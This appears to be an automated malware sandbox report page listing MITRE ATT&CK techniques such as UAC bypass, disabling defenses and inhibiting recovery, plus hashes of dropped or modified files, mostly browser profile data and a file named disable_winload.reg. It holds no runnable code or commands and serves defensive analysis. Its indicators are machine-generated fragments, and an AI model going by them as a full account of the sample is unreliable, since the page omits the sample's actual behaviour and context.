Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma
Filesize
16KB

MD5
cfab81b800edabacbf6cb61aa78d5258

SHA1
2730d4da1be7238d701dc84eb708a064b8d1cf27

SHA256
452a5479b9a2e03612576c30d30e6f51f51274cd30ef576ea1e71d20c657376f

SHA512
ec188b0ee4d3daabc26799b34ee471bee988bdd7ceb011ed7df3d4cf26f98932bbbb4b70dc2b7fd4df9a3981b3ce22f4b5be4a0db97514d526e521575efb2ec6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
280B

MD5
57a59862764f93e0db15d19588a1bf0d

SHA1
6395b5c04714684dd3c9fe91ef320f8c96589408

SHA256
e2ba074fa03fe36fe67aada9ec089dbe57eb75ad5bbc2cf0c1acf1784cb2d325

SHA512
2e3fe9df098519ad6e84f2ac469521ff75713dad6dc2372f2a47c86a9c70ecb5feeb79e3d90981d9b9bcf39fd9d77916f1b56714b800d4679804236aa88a7ede

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
280B

MD5
8a943235347945a47cc7bf6d526efba2

SHA1
04bed2470ca6c2bbb3b94c5e3d0fff1978d4986e

SHA256
9ae2eb965708c552df31174a6dd47196986bf5dab29af6889fecf1c0c68f386b

SHA512
934679f97318acc5c950911412369325ab72c7c7c69a1c2232da6f3edefce53dd1023ab15ccc7f1fc1e6f5271adb0fceb31752f8ddb78dd2b95e625a79744c3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\185df0c1-5ef5-4866-b561-59f00fc7a5d8.tmp
Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0
Filesize
44KB

MD5
1a530e201f79e7bf348c1d9f370c931d

SHA1
5b216882d1eeebc9c3d722f85480c8101f6ad3ec

SHA256
39752d0b46201f8cd056378e0dea67e6a8813640fcff039b84c7b6774c10ea73

SHA512
cef6f4e6216cd775e5c5facb09d3bdb6e94af8b3b017c9cb5cb766c83ac7c3fff39c537b9de1ea1277c11b50e9c8168d7fcc893b8123fa25df3952f3f370ecc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1
Filesize
264KB

MD5
72ae60acaf59c703c0afe4d6eae55d30

SHA1
540f7daf6458f50b929d7f59a5d161ee0ec03546

SHA256
60530e55674a9f511784842ba8921695a3b160a496ed8b3228ab1be1c3039815

SHA512
161762f0457444159b8de401b92f2ae8c5d9c24c6de593ec9ee459427b7e41fc622d8cdcf22f5a793207977ef0fa517b897411bbf615ae4d833daa2685f62a18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2
Filesize
1.0MB

MD5
22f65f839d7de81242f284a8c4249e7a

SHA1
16abd12a7774c3dd7aace0b313b342a22430a0a5

SHA256
9be86473773849097a21318a2a8a1533d1fb005afec7cafb01ef9607e86fc87e

SHA512
33ac921f8805a9e1560cb105b6127a3997be01f7347f3215b4301669ab34d06952bda6a19bdb5e3ba75f2acdda4349968510f0afb7dd80a23239175915ac96e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3
Filesize
4.0MB

MD5
2c75c5015438644cfe7672b33e2a3ce7

SHA1
bf195e6a40ffe7d856da91e6eb2e41528b8e5cc8

SHA256
23bdf32b2b9c4f5fd0cd5ae8e817fd5c90feb8d6c2673e91ba2078325ceb94d4

SHA512
b4fb044dc31dc1f2def09e8bd18377262116d1c10232191b16d2db349850924bd0e4833de9da59b9a0462303cbf944411e78c4907a6d35ec90bb8427801002c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
336B

MD5
df98d3f3982bda2173bac75bbac30205

SHA1
9885a14de7e3e6989139e6ebdbcbf6320649ddda

SHA256
e85fbc7e40f23d12343f1e24a5c279781001263de3d8ed9d4ec3ae1fd429a18e

SHA512
3bb659e9a9810d5c117989796f4b52e30071a0a8e7b33c5c4d791aa65139cd2ed479e8c5c3b1063e017b195c3422b72218bee6cd9794a5d560af185c44cc375e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG
Filesize
343B

MD5
ffed1d2f72e55040f739d9274c998b7f

SHA1
0ccf24d00c1b4d316cc742313efd3c30b7444754

SHA256
92035273cfe5ddada8a951f49ae5fb88db9888f170bc97f4fa89bac4ac675c6f

SHA512
233331290451ee48262fb875dc7fc614541e7732914ee2a29e10cc236d7b7b4306ca5a8aad0ead67f90555f457edc82826e0cc0d932eb15df1e945012a96c309

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db
Filesize
32KB

MD5
4bb9ac6e72faeca724642933fee1879b

SHA1
6a1e7ced5e5c772e883c85230369df56f654ded9

SHA256
71f98af6eae3264b10e021f43416330636f550efa645a6a833d1b234d40427fd

SHA512
bf9ec85288225c06e4898c066e0fc5629443b33d8d0807883685f201055c56906346f40b376e21b6a18b0e9f685ca2ca77807cf4b4d5eaf11e6fea01864a47bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
Filesize
322B

MD5
0e012c4b886bad8ba6a0210c32bba83e

SHA1
4f0e3c5546bf56e47b6999a24d01cce43d325fba

SHA256
712d072fd64e7075e26ff3163be0ec4a396a038425c3ca7765001ed45851669f

SHA512
76cf194575e48c91de575982b43aeff3f7abded83fbfab514ebf725d5df484983abb5989a07bbca8ac4cd764c0a37fa82fe19d923ec233d0919f5b5acf1c96e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
Filesize
192KB

MD5
2b93e34e25ce01f09087f183ebb860ed

SHA1
245903d625b3948560e9a047dcc758289d354b87

SHA256
4606adf75ac0f12aefb9b8102c804b57fdceb23c117d977ca55079efc3f39d9e

SHA512
cf01fabe6df578d79dc49d8208ebf8195d95c635739ec7bf5a2bd1288b20ca569ce0bb6d785ebf4e342de09233ffab6337ae077391e273f3ec1958b7a549ff33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
Filesize
331B

MD5
6cbb20a82acf558bf6344b38eff1bd33

SHA1
b790ae46dcc76fba6217065948b99c73a34ce137

SHA256
3da7deca7109d32ae79a137e7c04b7e43296090d707536cc78af5fb3d3979c7f

SHA512
67734cac0958cff9def23246b6d23eb650d61a51d280cbbd95a5323cc51d38713fd16e2b28c6541ea6e9ae4b3ad177dfaf3f37963e9e0d4d6565853527e21209

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Filesize
20KB

MD5
002245b7dac76fa90ede1b93bf3e658a

SHA1
2ef47f1e3ac34fcd9517b4d72b9ecaa011e4511e

SHA256
f21525d5ba7d293b9ab70404045d01d91ce60d73204b0cd17ab5cb79157a6e68

SHA512
4fb6649f9d5cc4910de3b35fcdf3d517d463de2bb157b90f7cea37b8404f1aa0206304734e50e31f3b34830e2bb5fc46ce35d9f986f0ca2aaf467e037cc06de1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
Filesize
2KB

MD5
cc2b20523a0bfc585cf2af6c82d9543b

SHA1
d7a6978111d869b7b5163e3873e3cbf6a5f7e07e

SHA256
afe141c1172ede3e153a5bd508915bf853b535872ad7ca904eeaca8d00d8b224

SHA512
eeed7a609a7cbe4c6f9f28f2d9d03317534977e18e4ff206abab2b6691ad2e9d639d38e734f030ea577d597a0ea8d4a06d9a12fab067392607643a0d8dd50a08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL
Filesize
36KB

MD5
60f9bdaab11643606bf6b93c4a270ee3

SHA1
945bc00c5a5a3cfa69c377be662bb917d5a345a0

SHA256
5d39ba254f1e62e7d652b3ff4e96e11f96f312c4581eeaa2e1477be21a50a068

SHA512
3e3de5e2bbeb17c3469ca03b36b77d6ee34abf1879db3a1c9264c25ed49f3f302428dc52943f75aa7bb5180b4292ce19e27d3317c8c88a309d7d6b6582e603ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
Filesize
690B

MD5
3b0c3051b3a1424e1663115922ce0183

SHA1
07bf41317b8e08c4abb1a94dc70f6585da097069

SHA256
e167d6dced70046a7d5be80723bfae4bdd8e80f4e85b73f22b83bfdeff79a6a0

SHA512
fcdfa3884da75fe0cda675bc72d066c15fd58254bf774443640664288edc728ce35b4f94206cf4c47f647375c7b16bc078b060ffe6361cfab451e5ada3e3eb3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history
Filesize
20KB

MD5
ba3206dd4440e098aced94571e461ab2

SHA1
03c76b02bed1a481438b6b253d0cea644c15069e

SHA256
50a6153269d51521beebc4d3bf3971b0f2c86ef6d5922312a13e2bbfbe78c45c

SHA512
54141469a55d77f154074aacf0455c41b9752a888f9e01868ed9e27253bd46048ead1ad2d394ba22c56f526f4c9706ce7c63070b61efb24ace613f6eb00be1c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
11KB

MD5
d4eed2c29bbbb49c9b05265793c7e15f

SHA1
dcecb891f84dd45c4733fb6d83938f26f56fd280

SHA256
d2a40aba0e9a3e71555fc12e1aa93851572027709bd014f53af55dce4f1dd4e6

SHA512
5485767cb9ae8043f51d805ea7cd6a97f9c2de600a507672259ea85bcbc0dd9ffc440ccdc33bb73d244976ed1dd192aef61019f72f312ff19bb73788f551ee9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
11KB

MD5
d212b92787c28692b1be53b22188bb1f

SHA1
eaacab81d81e714383fae1f7763cf68c1105b544

SHA256
641bbb34bd0dc23ae2dcfd2f3ea657dc6413651fec0b764bf1eac3657b405cb2

SHA512
82aceb299821e7358c59decd22a377af55a39a2d96e63cbee9f73cd9d9b0d743d1db0ba650988dc0164f641e84d33a6d293bb8c939ce93a2eda0b4776ef3046b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
12KB

MD5
b80346bc27e819dd20d3ca7df0231e83

SHA1
a6764f1596a60feed5ec00d7db66fabe965a11dc

SHA256
b8ca1804c37db16a765d523eb547365fbcf8591a45c89d502934e7966f5bfa7c

SHA512
31d7bfb08fdb6f6f86f33a872723e05212fa8cd18cdf680154c52d49531b760b029b506244043b1fbed885ddf3b4f6e97f98a4032c3fee971024d23c82141f86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
30KB

MD5
18827693a4cbf5427d21c6d3ea98eca5

SHA1
9783a0b80ebc960b4ab078191b3ccd8c8363c7a7

SHA256
c0e3d18057d5614389a5e8ce049e069f6e4831d92ff969eb8dc7a7e869a03247

SHA512
ac5e7618e3a15a153214b0e01c70944c46b41ed547539b6026e9ebf36238f1e25ef1088a20146e20b6694e3bc5396d026b9d34fdcceef88c74f2864e0d91c350

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log
Filesize
256B

MD5
d000f1fd6abd5db759be1f80d485e033

SHA1
1da5d9b9cc004238bae56a036655f1e7f13c1707

SHA256
e38e68f43815af49ee8de4d263ae6870182df5b28543e9b3453c1a7bee8792c6

SHA512
f245e1097d7b291aef6f4ec24f55b87e218f7ec9fb77e686eb694da6a3130fc9b89bb6f0dcbae0a09787a1673ba9eae68d83f0a6d2bfc7ae02ea9a74d9102933

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
Filesize
347B

MD5
0393255e0297ad470513bbb56672cf89

SHA1
e25d879409fed89b2c4cf9330fa67e91ef70f7ea

SHA256
723c7a3d3e8e0482ff8c209315a5d0495ec575753edcaca4ffcecf30e5438452

SHA512
dc02ff78efd8aa00c07c8185e2fc048c2aca657c101cc3c34c899859fdc650c2ee3af4a801995de4074da453e7b914b43cee148754393a28d7509fc5305c6810

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
Filesize
326B

MD5
78306808acee50feda7f48f665107923

SHA1
334b827d75a0241b38da4029b25dc79a885673fb

SHA256
42b0a98cbed65a314e5b040d3b1c006e9ee538108d29ac8ac96109133051e9ad

SHA512
f64d28fb90bba8d413fcaa38456a9dfb344eaba09b8c349acf2802be15f66c63737e5a7eaf669f585a6bd51bf22bd028346beb3366b125f52113abd1d13cfee6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
Filesize
128KB

MD5
35a9a35c535e739d30b3bb469082608f

SHA1
ab727ec572d3f30f198176814bcc40a704310d00

SHA256
b235b85a1f2f76e7023242a47f0fa4b478aa645ffc7d06ab7910571f192d4f51

SHA512
ab960f394bc7ca5e5e42bdcde14457fe50ad594371f27c118d24e6bf1ae26e9901c8afdfb7c6a6dcd39edc00017c0d68a8fe067cbe843e96b29d7d992f34718c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Vpn Tokens
Filesize
28KB

MD5
599549ca7050fda41d48cd1d92212e59

SHA1
9e44dec26d7dbced9ca1214da493f613f9cb0150

SHA256
8eb4364904924eac8f323797cec4569b52c109a32d2d848af8fe3e4fd87eacba

SHA512
bd0da72d7582c887cd2e451841d8dcedf84b7d631220f696ad1b73611e88c77a6a974781b288a422c28cdf91fa74a2d5ca779403282f717a4a59de31b352e933

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data
Filesize
220KB

MD5
3d9fc56a4b62bfe30bdca649e1d0dde0

SHA1
a7b9e46e6893fb3c351d0d719f64593ea0fb2195

SHA256
bd113567512812db5035c65ffea93b28bfa29e43d9167b620ff818929331e32f

SHA512
ac4a2dcf41057fcf108f3383882ca10912e1f260dd7244540e834f5e981fad5d66b01e68c19719ded0cf814e8c187d51e95a07ebd056bb09e8a055d8660d3420

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\default_cloud_config.json
Filesize
10KB

MD5
57568101acebec0d0b6da71cae750ffe

SHA1
fef13f40e93641a18401b572d2004a0d88c4cabf

SHA256
ed8dd56e4b9f5b0a5cd21bce41b3dc5a863e7960e0880dc454124ad84bdf5660

SHA512
9a3422a013c8941d7c14ba079e7c871ed23884cefe9d5ccb498acc2503c4745c5cc8ed6588fdc3d51260f7c3bc14f1d47b9747e27def3d40b842f41b2436c796

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
Filesize
924B

MD5
30c8153ad37125ec8c78b2dde7601cf6

SHA1
00d24cb15edc63761f939d2a0287510d9a4f0d4b

SHA256
10a396a4754ba4b310534f211acf77ae380362e04e73cf5e806e77c15f773dfc

SHA512
6c840525232a1774032ec67897c89e8e12f2198e9a4b52a0aa2455d1cb227d46e77a70c77c30dadfcde3215588bf0a9f51af73be9050b22ad24b8d25fc99ebb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
Filesize
322B

MD5
727a80b271decdb6176752703a858ec4

SHA1
f8780261299d12a5204a47f8caf4fc5139ab0145

SHA256
464c59c2c65de00dc6373e71762c742e58cfe3c73b794beb061a1c2defccde9c

SHA512
078e46a8fed4fcb6588b731b561504910b959b3c2286c2939580ad01c1333f12113c75dbd9b50a8ffa68fb0c883846944a17e05feaab29c828e74ac0c77fb8dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
Filesize
922B

MD5
e8ef9bcbabb3e8c2fdfd8aba63ef8d16

SHA1
1b6c16fdc6a9dd03c84496fe65d00ff2bd83a667

SHA256
aebe35ec8f4a9a0072b29917566ef7e371f67c386bd668f57c26af9f467bbba9

SHA512
e77e44ad3eefd4a69bd1b3497a03b2625bb617c20cf2070462a9e6798a73d0fb5dba1cf2b09b336a5385fecd71d696fd4a8dbb56fb9b718db6281ed6580b76b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
Filesize
340B

MD5
d572551f4976eba68f4db264cb9dbb38

SHA1
f6c34031cefa094c1d2f9cee2001949ddc50da24

SHA256
a8882a1219ed9c492b8b07c726172dc107fc5fb16bd9031c37e8578595e436d2

SHA512
e8cbba6c90c891bc8107b954657fd023cbe38773da07631a98deb601781fe7f492c3fa7f90c892c33d1ead4780e4a7e0f7a304c1b8eb5d714bc66afe4d820724

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_0
Filesize
44KB

MD5
505d2e05de14af59a5681b60133e6855

SHA1
cfefed58ade44a9976d8c846953aa6a76fe29d53

SHA256
d54c6a67c94dd50fddaf87522510971321d8e86ba9390d62ba964be9499f3d04

SHA512
c1b6218c6bb8b3ce5a5638b7bd0b968e762aef576fd51b58f9e7a7d43d87cb348394971e9d10fa860ef0d8cdf8bf693bf54962d4df715374d46dd5234969d5fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1
Filesize
264KB

MD5
ca56d250ab9aff185e810895c3078b98

SHA1
71315e7e700b17a138be7f9194921335395c81a3

SHA256
c6491ed927c629e43c3fa1a042332623028e88b4da613b1fd786ba900ff55750

SHA512
c6a8b354f844688cfb109208816a5b850b487d860d26cc3fbcd9957fefd69fc22d45c74bacd65cc2666dc3da5d4e9706b61e56fcd134b5b72ce8f8b81cfa6047

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3
Filesize
4.0MB

MD5
ecbea603622eea6b809646a011a48f3e

SHA1
857f0e21bc07e3008f5daa0dd096e49d56120e23

SHA256
d8309f99e535a67b6b4a8ee81c0554f999162201b5137c3a8cf51cea365ae02b

SHA512
fb5451ad702acd7e78622e91368aeed844d42a4eb4af0bc3636dcbb557488492384f033c6a65d9ecc3dd7e487302898f7eda5463c0a802a3e264359b50aea4d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1
Filesize
264KB

MD5
4b3902977900cb1ff9a74297e1b54bb0

SHA1
8945ef706dda2142403f65d4f6d5eda0f2e89514

SHA256
ca905283b4640dbc446ba00eedd28276bb821dd3ad2ee955bfe17207ce14039a

SHA512
b3bbf2c2d87ab520493b6b129e323c850a1fc95492d8bd4ee8b459ee63e433509e2f6885c615e023f3c1b239c72fd0d946a9d04c5d349aa8805ce1d67b8cdf87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Browser
Filesize
120B

MD5
a397e5983d4a1619e36143b4d804b870

SHA1
aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4

SHA256
9c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4

SHA512
4159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
Filesize
13B

MD5
9f0786e66f4c80870bd874b7aba0a394

SHA1
74d461c9049086ea0301b956203e7cb59438160d

SHA256
da3e73d31020d249d320f01fc40220043e34ebc99fccaec56c5a97f671a8f227

SHA512
f766b4ee7c28886c1901cf76c1c917e296ddfd3cf843f4f27d7a73db37247ae0dfb8c3f343c4ba124d20f4475e0fb4cf60860215480341715bb907d73630cc6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
72KB

MD5
e5134754542d0b53b12a88681715aa9c

SHA1
611ba737521d52888985dbc1d35b7d04a8495e74

SHA256
046fe2206d2d8c0538d223b83ddae0dfd9c14e23bb1b1bdf204760c10d93306a

SHA512
34be982aa73e860c6c8bf34201e543e4b8e02125a9520d264f13071cf30f6415cc915befd569c0480cafc913fd8b843fc2dfd01a66c05877b3cebe82fb177fd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
75KB

MD5
195a0ed630d0cc9e2c73f15f78d3bd4e

SHA1
ce1a3db98c0f155de7f8df9b1f291abe99b5084e

SHA256
33ed5e0dfe68b5d508d7cba724001b73a640f4572c4fb0ab282364223b2fe6ac

SHA512
55332ceaf4e4c8486e43b2b92da37c52387a9915649c571f31f8980e46a7d4e0a01f11acdfca3b8f27a2eacf29bedcc7f6ac031945b99748207843887d81904b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
72KB

MD5
2329884ec278cb37ef322f66a79f8325

SHA1
64025aaaea99a5a4c9cf9657482752eccddf1c27

SHA256
1b318cbdff6dcdd4cb237b71f97f12ce21eb06688792763219996741e3d57f6a

SHA512
239f0cb64a7e67d2780b457f79624cdd8c948a55fc2ed7ea6e099a22d79e8600ff1f8cf1ca5268cc0772d4a49b7ec8c1cdd39f5fbe130ade1fc344ea7b8a5316

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
72KB

MD5
cbfe9f42607d03aebfb17ea5257ff187

SHA1
ac8c3344916d70c33cb9cedb631fb09c8ef4b9a0

SHA256
61bbeb0fc8ea23f18da3c08af8920d2b163eab8d47797a32bff51a4e674d7364

SHA512
25d49b1a1271b8c13478de075f3d50134f2a66cf9aef397fab75c39826c0b7d846fa003751ab0158496b16e4f3bfffef473f302284399694697af42b46300a45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1
Filesize
264KB

MD5
cdbdf0434142759c7fd2fac6681ad383

SHA1
e696eb8f00cefece40bb26b5d1c6c2066c6bcd0b

SHA256
7c5904196116943ff5937746461f94efe21cb469332d53dfaf7bdc76f1605d0d

SHA512
d951adbb416900f515402dbdabd3ecc6be6e10110787ae82a023c30b1166eda429c36bf6f0cbb2403ed2d79f5558950d6214b59f011abd7cb17ed1c135cc728b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations
Filesize
86B

MD5
961e3604f228b0d10541ebf921500c86

SHA1
6e00570d9f78d9cfebe67d4da5efe546543949a7

SHA256
f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

SHA512
535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize
2KB

MD5
0a54b44961bad08a9ced9770ad64a66f

SHA1
c89479167f3fe4c58543a7cfc05487cf5ecac8af

SHA256
ac09c78f31c57e704be7fbcd2cbe3965555782fffb5431031602427529b3fbbe

SHA512
6d7cb66ff8d2c46d89d06088fdd87322ed3554c55637aa0b6cc6c7f54f5c634b7b10452da3fd0568a86fad2707d49b85f71a2a8d8a15997cf5ab83d80d104b24

Download Submit
C:\Users\Admin\AppData\Local\Temp\cv_debug.log
Filesize
1KB

MD5
ca7b47c9dcd754a3106a9bd8403bf25b

SHA1
42f5bec4525a59758296bef04c5f7886be989efc

SHA256
051407ad4574d264278a3b6c14b5ad870ef7eb0d49141c9b4919b24a0acd94f4

SHA512
34d59bc0860a24a1f4507976ca12cc40da42c32824a161cc23ac8ab7bbb76959a0bf2307d390401ebf26fb2e04b181075b07036777191a6655cdf17cba807a72

Download Submit
C:\Users\Admin\AppData\Local\Temp\disable_winload.reg
Filesize
91B

MD5
47b5ae368c4aff20eafa90ffdcd03a34

SHA1
dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81

SHA256
aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07

SHA512
c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
Filesize
24B

MD5
60476a101249aedff09a43e047040191

SHA1
de5b6a0adc7de7180e19286cf0f13567278cdb64

SHA256
35bc77a06bfdde8c8f3a474c88520262b88c7b8992ee6b2d5cf41dddc77a83fb

SHA512
f1d2dcc562a36434c6c6405ec4eac7ecfa76fc5a940114da6f94495b77584a132d5d82ad3556df749490be096cfd238fa8b484b7c734cbc4d074e963e5d451f4

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
7KB

MD5
5a7e020ba68fa1d472a9720366c289ac

SHA1
efbc5340b726dbe321f676118fc6f2edd12159e8

SHA256
a45a63cc7d8ee3e6b28ca7fa71539f0968aafefb97b3b1a2c1554595d48eca1e

SHA512
2a0d35f7263faea87bb34ff4c30218b49bc6dd0e8d41e72323325406afb60543d31e6be4c2b874a9251e486c6c98e14d6826053ada8bcacfe46b26d0487592f1

Download Submit
\??\pipe\crashpad_3276_FOEWMXKZWVFTZLJK
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2168-10-0x000001642DFD0000-0x000001642DFD1000-memory.dmp

Filesize
4KB

Download
memory/2168-11-0x000001642DFD0000-0x000001642DFD1000-memory.dmp

Filesize
4KB

Download
memory/2168-12-0x000001642DFD0000-0x000001642DFD1000-memory.dmp

Filesize
4KB

Download
memory/2168-9-0x000001642DFD0000-0x000001642DFD1000-memory.dmp

Filesize
4KB

Download
memory/2168-0-0x000001642DFD0000-0x000001642DFD1000-memory.dmp

Filesize
4KB

Download
memory/2168-8-0x000001642DFD0000-0x000001642DFD1000-memory.dmp

Filesize
4KB

Download
memory/2168-7-0x000001642DFD0000-0x000001642DFD1000-memory.dmp

Filesize
4KB

Download
memory/2168-6-0x000001642DFD0000-0x000001642DFD1000-memory.dmp

Filesize
4KB

Download
memory/2168-2-0x000001642DFD0000-0x000001642DFD1000-memory.dmp

Filesize
4KB

Download
memory/2168-1-0x000001642DFD0000-0x000001642DFD1000-memory.dmp

Filesize
4KB

Download
memory/3604-382-0x00007FF72FB80000-0x00007FF72FC13000-memory.dmp

Filesize
588KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads